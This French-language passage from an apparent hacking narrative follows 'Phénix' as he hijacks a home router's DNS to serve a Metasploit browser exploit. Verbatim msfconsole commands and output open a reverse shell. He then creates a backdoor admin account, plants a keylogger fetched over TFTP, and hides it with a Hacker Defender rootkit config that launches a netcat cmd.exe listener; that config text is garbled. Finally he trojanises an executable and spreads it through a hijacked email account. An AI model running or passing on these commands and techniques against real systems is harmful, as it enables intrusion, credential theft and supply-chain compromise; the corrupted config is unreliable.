Lexcitation diminue un peu lorsquil se rend compte quil va devoir travailler pour que tout fonctionne avant que le type de Quizzi ne rentre chez lui et essaie dutiliser Internet. Voici les tapes prvues par Phnix : 1. Charger une attaque ct client Metasploit qui dmarre un serveur Apache, attendre une connexion dune machine vulnrable avec un navigateur vulnrable et envoyer un virus sur la machine. 2. Mettre en place un serveur DNS contenant un enregistrement A qui rsout www.google.com en ladresse IP du serveur Apache cr ltape 1. 3. Congurer le point daccs Wi-Fi pour quil utilise le DNS cr ltape 2. 4. Attendre quun utilisateur du rseau essaie de naviguer sur www.google.com, ce qui lenvoie sur le serveur Apache et lance un exploit contre son navigateur web. 5. Cet exploit devrait offrir Phnix un accs privilgi lordinateur infect. Construire linfrastructure de lexploit Une fois son plan clairement tabli, Phnix commence assembler les pices dont il aura besoin pour son exploit. Il commence par installer un serveur DNS. Phnix ouvre

164

Chanes dexploits

sa fentre VMware et dmarre une machine virtuelle Windows 2003 quil a cre exactement pour ce type de situations. Phnix fait une courte pause et rchit : "Il faut que je fasse un schma pour conserver une trace de tout ce que jessaie de faire." Il dmarre Microsoft Visio et dessine rapidement un plan, illustr la Figure 5.15.
PC de Quizzi sous Vista Routeur du FAI WEB

Wi-Fi de Quizzi

Phnix connect au point d'accs de Quizzi

Utilisateur mobile de Quizzi

Figure 5.15
Schma de Phnix de sa conguration et de son environnement.

Phnix se rend compte quil naura modier que le champ du point daccs qui dnit le serveur DNS primaire. Il devra laisser les serveurs secondaires tels quils sont dnis. Cela permettra son propre serveur DNS, fonctionnant sur son instance de 2003 Server sous VMware, de rsoudre les domaines externes. Phnix, satisfait de son plan, continue mettre en place son serveur DNS. Sur sa machine sous Windows 2003 Serveur, il lance Dmarrer > Tous les programmes > Outils dadministration > DNS. La Figure 5.16 illustre laccs la conguration DNS. Un sablier safche pendant quelques secondes et lcran de conguration du DNS apparat. Phnix clique du bouton droit de la souris sur Zones de recherche directe et choisit Nouvelle zone. La Figure 5.17 illustre la cration dune nouvelle zone DNS.

Chapitre 5

Chane dentreprises

165

Figure 5.16
Lancer la conguration du DNS.

Figure 5.17
Crer une nouvelle zone dans loutil DNS de Windows 2003 Server.

166

Chanes dexploits

Phnix doit alors cliquer sur Suivant pour accder lassistant de cration de zone. Lassistant lui demande quel type de zone Phnix doit crer. Il choisit Zone principale parce quil ne veut pas que le serveur DNS essaie de travailler en tant que ls ou serveur secondaire des vrais serveurs de google.com. En dautres termes, il ne veut pas que son faux serveur DNS sorte demander aux serveurs DNS de Google un transfert de zone ! La Figure 5.18 illustre ce choix.

Figue 5.18
Choix dune zone principale en tant que type de zone.

Phnix saisit alors google.com comme nom de zone (voir Figure 5.19). Phnix accepte ensuite les choix par dfaut des questions suivantes poses par Windows. Pour nir, il clique sur Terminer. La nouvelle zone est afche dans sa conguration DNS (voir Figure 5.20). Il suft maintenant de crer un enregistrement A pour www.google.com et de mettre en place les redirections. Phnix a cr la zone et na plus qu ajouter un pointeur pour www. Il dplace son curseur dans la partie droite de la fentre et clique dans la partie blanche avec le bouton droit. Dans le menu contextuel, il choisit Nouvel hte (A)

Chapitre 5

Chane dentreprises

167

Figure 5.19
Cration de la zone DNS google.com.

Figure 5.20
Cration de la zone google.com termine.

168

Chanes dexploits

Il saisit ladresse IP de sa VM Backtrack telle que le point daccs de Quizzi la lui a attribue et www dans le champ Nom. La Figure 5.21 illustre la cration de lenregistrement A pour www.google.com.

Figure 5.21
Cration de lenregistrement A pour www.google.com.

Phnix doit maintenant congurer le serveur DNS pour quil transfre toutes ses requtes pour les adresses quil ne connat pas un vrai serveur DNS. Phnix reprend ses notes et regarde la conguration quil a rcupre propos du WAN (le ct Internet, connect au routeur du FAI de Quizzi). Il enregistre les adresses des serveurs DNS primaire et secondaire et les note. Phnix retourne alors sa VM Windows 2003 et, dans la conguration du DNS, clique sur le serveur lui-mme et choisit Proprits. Il clique ensuite sur longlet Redirecteurs et saisit les adresses IP quil a copies dans la conguration WAN du point daccs de Quizzi. La Figure 5.22 illustre la conguration des redirecteurs DNS. "OK, se dit Phnix. Si je ne me suis pas tromp, je dois pouvoir mettre ce serveur DNS comme DNS dans la conguration de ma machine hte. Quand je saisirai www.google.com, je devrai rcuprer ma VM Backtrack plutt que www.google.com." Phnix commence raliser la complexit de lattaque quil tente de mettre en place. Lespace dun instant, il doute de lui-mme et se demande sil nessaie pas de faire quelque chose de trop complexe. Mais cette pense le quitte rapidement. Phnix ouvre alors sa machine Backtrack et dmarre tcpdump. "Je dois dabord voir si la requte

Chapitre 5

Chane dentreprises

169

Figure 5.22
Conguration des redirecteurs DNS.

marche avant de perdre du temps mettre en place linfrastructure de lexploit." Il lance tcpdump dans sa VM Backtrack, retourne dans sa VM Windows 2003 et essaie douvrir ladresse IP de la VM Backtrack dans Internet Explorer. Il na pas encore mis en place de serveur web dans la VM Backtrack, mais il sait que ses essais devraient safcher dans tcpdump. Cest effectivement le cas :
12:17:49.032688 IP 192.168.1.22.http > 192.168.1.10.1041 R 0:0(0) ack 1 win 0

Tester lexploit Phnix est content du rsultat. Il revient sa machine hte et congure le DNS principal ladresse de sa VM sous Windows 2003. Il essaie alors daller sur www.google.com. Comme prvu, il obtient une erreur : la page ne peut pas tre afche. Il vrie son tcpdump sur la VM Backtrack et voit une autre tentative daccs, provenant cette fois de sa machine. "Formidable ! Le DNS fonctionne. Il suft maintenant que je fasse fonctionner Apache sur la VM Backtrack. Je dois aussi me renseigner un peu plus sur lexploit ct

170

Chanes dexploits

client qui est cens fonctionner sous Vista." Phnix ouvre www.metasploit.org et commence y lire les forums. Aprs une heure de lecture, il a dcouvert que lexploit fonctionne sur un serveur Apache qui force lenvoi dune page HTML mal forme aux navigateurs qui se connectent sur le serveur web. Phnix dcide quil en a lu assez et quil peut essayer de mettre en place lexploit. Il ouvre Metasploit dans Backtrack et tape la commande show exploits, qui afche le rsultat illustr la Figure 5.23.

Figure 5.23
Metasploit dans Backtrack.

Phnix parcourt la liste de plus de 300 exploits et trouve celui quil cherchait. Il copie le nom de lexploit, tape la commande use et copie le nom de lexploit. Il saisit ensuite les autres options ncessaires. Il ajoute dabord loption SRVPORT, ncessaire pour dterminer le port sur lequel fonctionne le serveur web Apache : 80. Il indique ensuite loption LHOST, qui est ladresse IP de sa VM Backtrack. Il veut que lexploit lance un shell dans cette machine. Il donne loption LPORT la valeur 7371.

Chapitre 5

Chane dentreprises

171

Pour nir, il dnit loption URIPATH, cest--dire ladresse quil faut taper dans le navigateur pour arriver lexploit. Par exemple, si Phnix avait dni cette valeur piratemoi, la victime aurait d entrer ladresse IP de la VM Backtrack suivie de ce chemin, soit http://192.168.1.10/piratemoi. Mais, comme Phnix veut charger lexploit via une redirection du serveur DNS, il spcie /, ce qui signie quil ne faut pas ajouter dURI. Lexploit ressemble donc ce qui suit :
msf > use windows/browser/ani_loadimage_chunksize msf exploit(ani_loadimage_chunksize) > set PAYLOAD generic/ shell_reverse_tcp PAYLOAD => generic/shell_reverse_tcp msf exploit(ani_loadimage_chunksize) > set SRVPORT 80 SRVPORT => 80 msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf exploit(ani_loadimage_chunksize) > set LPORT 7371 LPORT => 7371 msf exploit(ani_loadimage_chunksize) > set URIPATH / URIPATH => / msf exploit(ani_loadimage_chunksize) > exploit

Une fois les options charges, Phnix tape la commande exploit. Metasploit semble ne rien faire pendant une quinzaine de secondes avant que lcran ne dle lgrement et que Phnix voie son exploit charg et en attente. La Figure 5.24 illustre lexploit congur et charg.

Figure 5.24
Exploit congur et charg.

Il est temps deffectuer un test. Phnix lance une machine virtuelle Vista quil avait utilise pour tester ses applications. Une fois quelle est dmarre, il ouvre Internet

172

Chanes dexploits

Explorer et navigue vers ladresse IP de la VM Backtrack. Phnix saute de son sige et laisse chapper un petit cri en voyant que lexploit a visiblement fonctionn. Il regarde le navigateur et voit les donnes alatoires qui y sont envoyes, ce qui, selon le forum, est cens se passer :
msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://127.0.0.1:80/ [*] Server started. [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Sending HTML page to 192.168.1.100:1046... [*] Sending ANI file to 192.168.1.100:1046... [*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047)

Un autre lment qui a attir Phnix dans cet exploit est que, une fois que lutilisateur arrive sur la page infecte, il ne peut pas quitter Internet Explorer sans terminer le processus iexplore.exe dans le Gestionnaire de tches. En dautres termes, lexploit enferme lutilisateur. Phnix retourne sa VM Backtrack pour voir lexploit de ce ct. Phnix est heureux de voir que lcran de Metasploit dans Backtrack lui montre un shell, en attente de son contrle :
msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://127.0.0.1:80/ [*] Server started. [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Sending HTML page to 192.168.1.100:1046... [*] Sending ANI file to 192.168.1.100:1046... [*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047)

Phnix appuie sur la touche Entre. Cela le ramne linvite de lexploit dans Metasploit. Il suit les instructions du forum Metasploit et tape sessions -i 1 (1 tant la session laquelle il veut se connecter). Une vague denthousiasme latteint lorsquil appuie sur Entre et obtient immdiatement une invite de commande lui montrant quil est connect la cible avec les privilges du systme local. Conant dans le fonctionnement de son exploit, Phnix est prt. Il na plus qu attendre que le type de Quizzi se connecte et tente daccder Google. Phnix est certain que cela arrivera ncessairement. Maintenant que tout est prt, Phnix se connecte au point daccs sans-l et clique sur licne de conguration WAN. Il modie le serveur DNS primaire avec lIP de sa VM

Chapitre 5

Chane dentreprises

173

2003 Server et clique sur Enregistrer. Il retourne sa machine hte, dont les paramtres sont dnis par le point daccs par DHCP. Il vide le cache dInternet Explorer et tape www.google.com dans le champ de lURL. Son navigateur semble planter et il sait quil a probablement russi. Il va voir sa VM Backtrack pour voir si la connexion quil vient de tenter dtablir safche et vrier que le point daccs la bien dirig vers le bon endroit. Lcran de Phnix se remplit de texte apparemment alatoire. Cela lui indique que lexploit qui tourne dans Backtrack a t envoy.
[*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://127.0.0.1:80/ [*] Server started. [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Sending HTML page to 192.168.1.100:1046... [*] Sending ANI file to 192.168.1.100:1046... [*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047) msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows [Version 6.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Users\Administrator\Desktop>

La Figure 5.25 illustre Internet Explorer attaqu par lexploit ani chunksize.

Figure 5.25
Internet Explorer attaqu par lexploit ani chunksize.

174

Chanes dexploits

Phnix revient sa VM Backtrack et se flicite en voyant une seconde session ouverte par une adresse IP diffrente : ladresse IP de sa machine hte.
[*] Local IP: http://127.0.0.1:80/ [*] Server started. [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Sending HTML page to 192.168.1.100:1046... [*] Sending ANI file to 192.168.1.100:1046... [*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047) msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>[*] Sending HTML page to 192.168.1.100:1055... [*] Sending ANI file to 192.168.1.100:1055... [*] Command shell session 2 opened (192.168.1.10:7371 -> 192.168.1.101:1056)

Pour tout nettoyer et sassurer que son exploit est prt accueillir le type de Quizzi lorsquil rentrera et essaiera daller sur Google, Phnix redmarre lexploit avec la commande rexploit.
[*] msf [*] [*] [*] [*] [*] [*] [*] msf Command shell session 1 closed. exploit(ani_loadimage_chunksize) > rexploit Stopping existing job... Server stopped. Started reverse handler Using URL: http://0.0.0.0:80/ Local IP: http://127.0.0.1:80/ Server started. Exploit running as background job. exploit(ani_loadimage_chunksize) >

Il faut maintenant attendre. Phnix sassied et rchit. Il na pas vraiment dcid de ce quil ferait une fois quil aurait accs au systme de Quizzi. Alors quil sapprte rpondre cette question, son tlphone sonne. Vu le numro inconnu, il suppose que cest son "employeur" qui cherche connatre son avancement. Phnix rpond et, avant quil ait pu dire bonjour, lhomme au bout du l commence parler. "Nous avons suivi

Chapitre 5

Chane dentreprises

175

ce que vous faites. Il se trouve que nous avons russi faire entrer quelquun chez Grethrip Harmon. Nous souhaitons toujours que vous nissiez, mais le but a chang. Nous savons que vous travaillez un accs via une tierce partie de conance. Nous souhaitons maintenant que vous installiez un keylogger sur le systme sur lequel ils font tourner le programme de visualisation. Le keylogger devra dposer sa capture sur un serveur FTP. Lorsque tout sera fonctionnel, nous vous appellerons et nous vous donnerons les accs au serveur FTP. Vous trouverez largent dans le placard de votre cuisine lorsque vous rentrerez. Je nai pas besoin de vous rappeler que le temps est crucial. Donc, dpchez-vous." Phnix sapprte poser des questions, mais lhomme a raccroch. Il hurle quelques jurons. Il lui semble que les gens den face savent exactement o il est, ce quil fait et o il en est. Mme si cela lui semble impossible, Phnix a le sentiment troublant quils savent EXACTEMENT o il est et ce quil fait. Phnix pense aux keyloggers qui fonctionnent comme lhomme la dcrit. "Je pourrais utiliser le code de quelquun dautre et le modier lgrement, mais je nai pas le temps pour cela", se dit Phnix. Il cherche sur le Web pendant une dizaine de minutes et comprend que cela risque de prendre un certain temps. Phnix envoie un message un de ses associs, connu sous le nom de Slack, et lui demande sil connat un keylogger qui envoie sa capture un site FTP. Le message nest pas parti depuis cinq minutes que, dj, il reoit une rponse. Slack suggre Phnix dutiliser Fearless Keylogger. Sans attendre, Phnix ouvre le lien que Slack lui a fourni et rcupre le keylogger. Comme toujours, Phnix commence par lire la documentation. Les instructions sont trs claires : congurez le keylogger avec vos options, comme ladresse du serveur FTP, le chemin, etc. "a semble facile", se dit Phnix. Il ouvre lexcutable du keylogger et obtient une interface simple mais pratique. Phnix clique sur le bouton Upload Options et remplit les informations du FTP que lhomme au tlphone lui a envoyes via SMS peu de temps aprs son appel. La Figure 5.26 illustre la conguration de Phnix pour les options du keylogger. Phnix congure ensuite les options du serveur, comme le montre la Figure 5.27. Il clique alors sur le bouton Build Server et obtient un message lui indiquant que le keylogger server.exe est construit et congur (voir Figure 5.28). "Retour lattente", dit Phnix. Une heure passe sans que personne nentre ou ne sorte du btiment de lautre ct de la rue o habite le type de Quizzi. Phnix a alors une autre ide. Il sait quil devra trouver un moyen de cacher son keylogger aprs lavoir install sur lordinateur de Quizzi. Il prvoit dintroduire le mme keylogger dans le programme Visu IQ via Quizzi pour nir par le faire entrer chez Grethrip Harmon.

176

Chanes dexploits

Figure 5.26
Congurer les options denregistrement dans Fearless Keylogger.

Figure 5.27
Options du serveur dans le keylogger.

Figure 5.28
Keylogger cr avec succs.

Chapitre 5

Chane dentreprises

177

Il pense un rootkit. "Jai du temps, se dit Phnix. Autant en proter." Phnix connat deux rootkits congurables et relativement simples charger : Hacker Defender et AFXRootkit 2005. Phnix est familier des deux, mais il dcide de commencer par AFXRootkit 2005. Le principe est de crer un rpertoire sur un PC sous Windows, dy placer le chier root.exe et de lexcuter avec loption /i, ce qui rend le rpertoire et son contenu invisibles Windows. Cela fait quelque temps que Phnix a utilis un rootkit ; il commence donc par copier le rpertoire du rootkit, tlcharg depuis le serveur FTP dun ami, sur le bureau de sa VM Vista. Le rpertoire et son contenu sont illustrs la Figure 5.29.

Figure 5.29
Contenu du rpertoire AFXRootkit 2005.

Comme le chier readme.txt le lui indique, Phnix cre un nouveau rpertoire nomm temp. Il y copie le chier root.exe (voir Figure 5.30). Il clique sur Dmarrer, Excuter et saisit le chemin complet du rpertoire quil vient de crer, suivi de root.exe /i, comme le montre la Figure 5.31. Presque immdiatement, la VM Vista lui prsente un cran bleu et part dans un cycle de redmarrages. Si Phnix avait lu readme.txt dans son intgralit, il aurait vu que le rootkit ne fonctionnait que sous NT, XP et 2003. "Bon, je suppose quil vaut mieux que je regarde Hacker Defender, du coup."

178

Chanes dexploits

Figure 5.30
AFXRootkit 2005 copi dans un rpertoire temporaire.

Figure 5.31
root.exe de AFXRootkit 2005 sur le point dtre excut avec loption /i.

Effectuer lattaque Mais, au moment o Phnix prononce ces mots, il remarque du mouvement sur lcran de sa VM Backtrack. Il remarque quil a rcupr un accs shell, probablement sur la machine dun des types de Quizzi :

Chapitre 5

Chane dentreprises

179

[*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Sending HTML page to 192.168.1.105:1058... [*] Sending ANI file to 192.168.1.105:1058... [*] Command shell session 3 opened (192.168.1.10:7371 -> 192.168.1.105:1059)

Phnix ne perd pas de temps. Il sait que lexploit bloque la personne en face car une fois que lattaque a atteint le navigateur de la victime, celle-ci perd compltement le contrle de la session du navigateur et ne peut arrter lexploit quen interrompant le processus Internet Explorer. Phnix appuie sur Entre et tape la mme commande sessions que celle quil avait lance prcdemment, en choisissant cette fois la session 3.
[*] Command shell session 3 opened (192.168.1.10:7371 -> 192.168.1.105:1059) msf exploit(ani_loadimage_chunksize) > sessions -i 3 [*] Starting interaction with 3... Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>

Ds quil voit la ligne de commande de la machine safcher, Phnix remarque que celle-ci ressemble nettement plus un Windows XP ou 2003. "Bon, ben cest un 2003, nalement", se dit Phnix en se mettant au travail. Il fait rapidement ce qui lui vient lide et se cre un compte sur lordinateur. Il tape les commandes net user habituelles pour crer un compte et lajouter au groupe des administrateurs locaux.
Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop> net user phoenix /ADD net user phoenix /ADD The command completed successfully. C:\Documents and Settings\Administrator\Desktop> net localgroup administrators phoenix /ADD net localgroup administrators phoenix /ADD The command completed successfully. C:\Documents and Settings\Administrator\Desktop>

180

Chanes dexploits

Une fois le compte cr, Phnix se connecte par TFTP sa machine sous 2003 Server, quil utilise comme serveur TFTP pour stocker des milliers doutils. Il rcupre ensuite le server.exe quil a cr prcdemment, cest--dire le keylogger. Il lance ensuite lexcutable en tapant server.exe linvite de commande.
C:\~Desktop>tftp -i GET 192.168.1.40 server.exe Transfer successful 16059 bytes in 1 second. C:\~Desktop>server.exe server.exe

Construire le rootkit Il est maintenant temps de construire un rootkit. Phnix va cacher le processus server.exe grce un rootkit. Il choisit Hacker Defender car cest celui avec lequel il a le plus dexprience. Il ouvre la VM 2003 qui hberge ses outils et son serveur TFTP pour commencer construire le Hacker Defender quil placera sur lhte compromis. Il se rend alors compte que le type chez Quizzi doit tre en train de regarder la page principale de Google et de se demander ce que sont tous ces caractres alatoires. Il sait quil a probablement essay de fermer le navigateur et quil en a t empch. Le geste logique suivant est douvrir le Gestionnaire de tches et de tuer le processus IE. Phnix met son ide de rootkit en attente car il dispose dj dun compte administrateur sur la machine compromise. Cela signie quil peut se reconnecter "normalement" nimporte quel moment. Il rouvre ladresse IP du point daccs Quizzi dans son navigateur et remet ladresse DNS initiale fournie par le FAI. De cette manire, lordinateur de Quizzi pourra retourner sur Google ds que son cache sera vid. "Revenons au rootkit", dit Phnix. Il revient sa VM sous 2003 qui hberge son serveur TFTP et tous ses outils, quil vient dutiliser pour mettre en place le keylogger. Il ouvre un rpertoire de son lecteur C:, appel, de manire approprie, kits. Un rpertoire hxdef, contenant Hacker Defender, sy trouve. Phnix ouvre le rpertoire et en examine le contenu, illustr la Figure 5.32. Phnix renomme server.exe en hxdefserver.exe, ce qui rend le processus automatiquement invisible pour Windows et pour certains logiciels antivirus. Il copie ensuite le chier renomm dans le mme rpertoire hxdef. Phnix veut que le processus dmarre chaque fois que Windows dmarre, et un point dentre via Netcat serait un plus apprciable. Avec cela en tte, il cre un nouveau chier nomm hxdef100.ini, requis par Hacker Defender pour fonctionner.

Chapitre 5

Chane dentreprises

181

Figure 5.32
Contenu du rpertoire de Hacker Defender.

Cest un chier de conguration qui dit au rootkit quoi faire. Il ouvre le Bloc-Notes et tape ce qui suit :
[H<<<idden T>>a/"ble] >h"xdef"* [\<Hi<>dden" P/r>oc"/e<ss>es\\] >h"xdef"* "[:\:R:o:o\:t: :P:r>:o:c<:e:s:s:e<:s:>] h< x>d<e>:f<* <\r\c:\m\d. \e\x\e /[/H/idd\en Ser:vi"ces] Ha>:ck"er//Def\ender* / [Hi:dden R/">>egKeys] Ha:"c<kerDef\e/nder100 LE":GACY_H\ACK/ERDEFE\ND:ER100 Ha:"c<kerDef\e/nderDrv100 LE":GACY_H\ACK/ERDEFE\ND:ERDRV100 /

182

Chanes dexploits

\"[Hid:den\> :RegValues]""" //// :[St/\artup\ Run/] c:\temp\hxdefserver.exe c:\temp\nc.exe?-L -p 100 -t -e cmd.exe ":[\Fr<ee>> S:"<pa>ce] "[>H>i>d"d:en<>\ P/:or:t<s"]\: TCPI: TCPO: UDP: [Set/tin/:\gs] / P:assw\ord=hxdef-phoenix Ba:ckd:"oor"Shell=hxdef$$.exe Fil:eMappin\gN/ame=_.-=[Hacker Defender]=-._ Serv:iceName=HackerDefender100 >Se|rvi:ceDisp<://la"yName=HxD Service 100 Dri<ve\rN:ame=HackerDefenderDrv100 D:riv>erFileNam/e=hxdefdrv.sys

Phnix enregistre le chier sous le nom hxdef100.ini en sassurant que le type de chiers est bien Tous les chiers. Il a dj copi server.exe et la excut, ce qui a dmarr le keylogger. Mais il sait quil ne dmarrera peut-tre pas au dmarrage et quun utilisateur un peu au courant verra rapidement le processus. Il copie donc la version renomme hxdefserver.exe, ainsi que tous les chiers du rpertoire hxdef, dans le rpertoire de TFTP pour pouvoir les tlcharger depuis la machine compromise. Maintenant quils sy trouvent tous, Phnix retourne la ligne de commande de lhte compromis dans sa VM Backtrack, y cre un rpertoire nomm temp dans C: et dmarre la copie TFTP. Pour nir, il lance le processus de Hacker Defender, hxdef100.exe, qui cache instantanment tous ses chiers malveillants :
C:\~\Administrator\Desktop\New Folder\hxdef> hxdef100.exe C:\~\Administrator\Desktop\New Folder\hxdef>

Phnix cache ainsi son keylogger et ses autres chiers et modie lenvironnement de sorte que tout chier cr sur le systme avec un nom commenant par hxdef le soit galement. La beaut de ce rootkit rside dans le fait que tout ce qui commence par hxdef est cach de Windows et de la plupart des antivirus. Une fois que tout est prt, Phnix commence explorer lordinateur quil a compromis. Il cherche un chier nomm quizzi.exe. Il ne met pas longtemps le trouver. Il se trouve dans un sousrpertoire dun rpertoire nomm Quizzi. Ce rpertoire contient un rpertoire Binaires,

Chapitre 5

Chane dentreprises

183

et Phnix y trouve ce quil cherchait. Phnix rcupre le chier par TFTP vers la machine qui lui permet dexcuter lexploit :
C:\quizzi\binaries>tftp -i 192.168.1.40 PUT quizzi.exe tftp -i 192.168.1.40 PUT quizzi.exe Transfer successful: 70656 bytes in 1 second.

Comme il la fait de nombreuses fois, Phnix intgre le keylogger dans le chier quizzi.exe (voir Figure 5.33). Il congure le chier hxdefserver.exe pour quil fonctionne de manire cache dans ses options dintgration.

Figure 5.33
Phnix intgre son keylogger dans le programme Quizzi.

Le message suivant lui demande comment il veut nommer le chier ainsi cr. Il tape Quizzi.exe. Le chier est prt. Phnix ouvre le serveur FTP o le keylogger (dont une instance fonctionne sur lordinateur de Quizzi) a dj commenc envoyer ses enregistrements. Il ouvre le premier chier texte et, comme il sen doutait, une des premires choses quil voit est lutilisateur tapant mail.quizzisoftware.com. Phnix apprend le nom du type de Quizzi : les caractres suivants capturs par le keylogger sont jacques.kipper@quizzisoftware.com. Il remarque ensuite la donne la plus importante quil pouvait capturer : selon toute vraisemblance, peewee$go! est le mot de passe de messagerie associ au compte.

184

Chanes dexploits

Phnix peine se contenir, il sait quil a bientt termin. Il se lve pour tirer ses bras. Il aperoit un mouvement, gauche, par la fentre. Quelquun sort du btiment o le type de Quizzi vit. Phnix suppose que cest le propritaire de lordinateur quil vient de pirater. Cette prsomption est conrme lorsquune autre personne dans la rue interpelle le trentenaire : "Salut Jacques !" Phnix sait que ce doit tre lui. Sans attendre, il ouvre son navigateur et saisit ladresse du serveur de messagerie quil a lue dans les enregistrements : mail.quizzisoftware.com. Il saisit ensuite les accs quil a rcuprs : jacques.kipper@quizzisoftware.com comme identiant et peewee$go! comme mot de passe. Phnix obtient immdiatement une interface Outlook Web Access qui lui prsente les rpertoires du courrier de Jacques. Il trie la bote de rception par expditeur et voit plusieurs courriers de son copain whynes@visuiq.com. Le dernier raconte que Will (le type de Visu IQ) dit Jacques (le type de Quizzi) que son client (probablement Grethrip Harmon) se plaint que quizzi.exe perturbe certaines de leurs applications web. Will dit que son client envoie linstallation de Visu IQ plus de vingt personnes dans lentreprise car elles lutilisent toutes pour la visualisation dun projet classi et construisent des rapports bass sur les donnes. Phnix lit quelques messages supplmentaires et saperoit que, une semaine plus tt, Jacques a envoy une version mise jour de quizzi.exe cense corriger le problme des applications web. Avec cette information, Phnix clique sur Nouveau message et saisit whynes@visuiq.com dans le champ To:. Son message est bref et amical : "Will, voici une version mise jour de quizzi.exe. Aprs lavoir examine, jai trouv dautres erreurs qui pourraient perturber dautres applications web ; jai donc pris linitiative de les corriger avant que votre client ne se plaigne nouveau. Merci de rpercuter ces mises jour immdiatement." Phnix attache sa version de quizzi.exe contenant le keylogger dans un chier ZIP et clique sur Envoyer. Outlook Web Access conrme lenvoi du message. Phnix espre que Will, chez Visu IQ, se contentera dextraire le chier, de le fusionner avec son propre produit et de dire Grethrip de le tlcharger. Rsultat Une fois le message envoy Will Hynes Visu IQ, Phnix range son portable et rentre chez lui. Il se connecte au serveur FTP de Visu IQ et attend que Visu IQ modie lexcutable envoy Grethrip. Il na pas attendre longtemps avant que la date de cration du chier soit modie : Visu IQ a probablement embarqu son keylogger dans le programme et demand Grethrip de le tlcharger. Une heure aprs cette observation, le tlphone de Phnix sonne : cest la mme personne qui il a dj parl deux fois pendant sa mission.

Chapitre 5

Chane dentreprises

185

"Vous avez bien travaill. Notre homme en place nous a laiss entendre que votre keylogger avait fait son travail. Il a commenc rcuprer des donnes sur le FTP et il peut accder de nombreuses zones rserves auxquelles un nouvel employ de Grethrip naurait pas accs. Il a galement pu rcuprer des messages lectroniques privs et professionnels, des comptes en banque et de nombreuses informations classies. Comme promis, vous aurez largent demain. Laissez le portable que vous avez utilis dans votre appartement, il sera embarqu quand vous serez au bureau lundi. Une dernire chose : oubliez ladresse du site FTP que vous avez congur pour le keylogger. Ne le mentionnez pas et nessayez jamais de vous y reconnecter. Si vous le faites, vous tes un homme mort." Clic. Lhomme a raccroch, sa manire habituelle, sans laisser Phnix la moindre chance de poser une question. Un an plus tard, les gros titres de tous les journaux se focalisent sur une attaque terroriste contre les rserves deau potable de la ville de New York. Les terroristes ont utilis un agent biochimique pour contaminer leau. Le plus grave est quils ont galement publi des documents qui montrent que lagent a en fait t cr par un sous-traitant du ministre de la Dfense, Grethrip Harmon, pour le compte du gouvernement. Autres possibilits Une entreprise de la taille de Grethrip Harmon a sans doute de nombreux autres partenaires commerciaux. Phnix aurait pu effectuer la mme attaque avec nimporte quel sous-traitant de Grethrip. Le rootkit Hacker Defender aurait aussi pu effectuer bien plus de dgts. Par exemple, Phnix aurait pu embarquer le rootkit dans quizzi.exe. a naurait pas t joli voir. Rsum de la chane dexploits La chane dexploits de Phnix se rsume ainsi : 1. Il a trouv des informations sur les sous-traitants de Grethrip avec de simples requtes Google comme link:www.grethripharmon.com. 2. Avec les mmes techniques de reconnaissance et un peu dingnierie sociale, il a pu dterminer dans quelle mesure Visu IQ avait accs au rseau interne de Grethrip. 3. Il a aussi dcouvert que Visu IQ envoyait des excutables Grethrip pour quils les lancent en interne. Il a aussi dcouvert que ces excutables taient vris par des sommes de contrle MD5, ce qui excluait la compromission directe du programme Visu IQ.

186

Chanes dexploits

4. En tlchargeant Visu IQ et en louvrant dans IDA Pro Disassembler, Phnix a pu identier un autre programme au sein de Visu IQ : Quizzi.exe. 5. Avec les mmes techniques quil avait utilises pour la reconnaissance de Visu IQ et de Grethrip, Phnix a lanc une reconnaissance analogue contre Quizzi Software. 6. Aprs quelques recherches, il a dcouvert que Quizzi Software tait une trs petite entreprise de deux ou trois employs. Il a aussi dcouvert que son propritaire travaillait souvent de chez lui. 7. Aprs avoir identi lemplacement de la maison du propritaire, Phnix a lou un appartement de lautre ct de la rue avec une fausse identit. 8. Rcoltant les bnces du travail dun gamin qui avait craqu le rseau du propritaire de Quizzi pour avoir du Wi-Fi gratuit, Phnix a pu se connecter au rseau sansl de Quizzi au domicile du propritaire. 9. Une fois connect, Phnix a pu accder la conguration du point daccs avec lidentiant et le mot de passe par dfaut. 10. Grce cette page de conguration, Phnix a pu modier les paramtres DNS du point daccs sans-l pour quils pointent vers un autre serveur DNS quil avait mis en place pour rediriger les utilisateurs du rseau sans-l depuis www.google.com une page contenant un exploit quil avait mis en place sur une machine virtuelle Backtrack. 11. Lorsque le propritaire de Quizzi a essay de naviguer sur Google, il a t redirig vers la machine Backtrack faisant fonctionner Metasploit et a t rapidement exploit. 12. Aprs avoir obtenu un accs cet ordinateur, Phnix sy est cr un compte, a cr un rootkit et a charg le rootkit avec un keylogger (cach par ledit rootkit) sur lordinateur pirat de Quizzi. 13. En utilisant les accs quil a obtenus grce au keylogger, Phnix a accd la messagerie lectronique de la personne et envoy un faux message au client (Visu IQ) en lui demandant de mettre jour un programme quil vend ses clients, y compris la cible relle, Grethrip Harmon. 14. Grethrip est infect par le keylogger, une autre personne au sein de Grethrip exploite les bnces des frappes captures sur plusieurs ordinateurs, et tout le monde connat la 